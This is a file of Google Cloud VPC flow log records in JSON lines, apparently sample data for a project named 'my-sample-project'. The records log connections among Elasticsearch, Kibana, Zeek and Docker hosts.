+{"insertId":"1gq7q7afe373fc","jsonPayload":{"bytes_sent":"55572","connection":{"dest_ip":"67.43.156.14","dest_port":53096,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"133","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373eq","jsonPayload":{"bytes_sent":"4615","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821049800Z","packets_sent":"75","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ev","jsonPayload":{"bytes_sent":"75612","connection":{"dest_ip":"67.43.156.13","dest_port":65318,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"583","reporter":"SRC","rtt_msec":"96","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373em","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ew","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":56478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373e9","jsonPayload":{"bytes_sent":"64140","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"371","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f1","jsonPayload":{"bytes_sent":"231764","connection":{"dest_ip":"10.87.40.76","dest_port":33694,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ff","jsonPayload":{"bytes_sent":"107878","connection":{"dest_ip":"67.43.156.13","dest_port":65276,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"614","reporter":"SRC","rtt_msec":"156","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fq","jsonPayload":{"bytes_sent":"595838","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":52430},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"299","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"14iipwlfd8t01n","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":56410,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"SRC","rtt_msec":"37","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01j","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":51950,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01o","jsonPayload":{"bytes_sent":"361966","connection":{"dest_ip":"67.43.156.13","dest_port":33876,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"80","reporter":"SRC","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01p","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":51950},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01e","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":58658,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01q","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":59924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":58658},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01k","jsonPayload":{"bytes_sent":"123732","connection":{"dest_ip":"67.43.156.13","dest_port":65272,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"618","reporter":"SRC","rtt_msec":"123","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01f","jsonPayload":{"bytes_sent":"76342","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65273},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"710","reporter":"DEST","rtt_msec":"115","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t018","jsonPayload":{"bytes_sent":"9761","connection":{"dest_ip":"192.168.2.73","dest_port":45224,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"end_time":"2019-06-14T03:44:23.955039461Z","packets_sent":"13","reporter":"SRC","rtt_msec":"242","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01a","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":56410},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"DEST","rtt_msec":"37","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t017","jsonPayload":{"bytes_sent":"51612","connection":{"dest_ip":"67.43.156.13","dest_port":65277,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"615","reporter":"SRC","rtt_msec":"95","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01m","jsonPayload":{"bytes_sent":"74330","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65272},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"745","reporter":"DEST","rtt_msec":"123","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t015","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"67.43.156.13","dest_port":59924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01h","jsonPayload":{"bytes_sent":"76622","connection":{"dest_ip":"67.43.156.13","dest_port":65273,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"599","reporter":"SRC","rtt_msec":"115","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t019","jsonPayload":{"bytes_sent":"42","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.168.2.73","src_port":45224},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:24.922448897Z","packets_sent":"5","reporter":"DEST","rtt_msec":"242","src_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t016","jsonPayload":{"bytes_sent":"75263","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65277},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"729","reporter":"DEST","rtt_msec":"95","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01c","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":34646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:10.529592195Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:10.413494375Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01d","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":34646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:10.529541195Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:10.413397239Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01g","jsonPayload":{"bytes_sent":"5044","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"87","reporter":"DEST","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 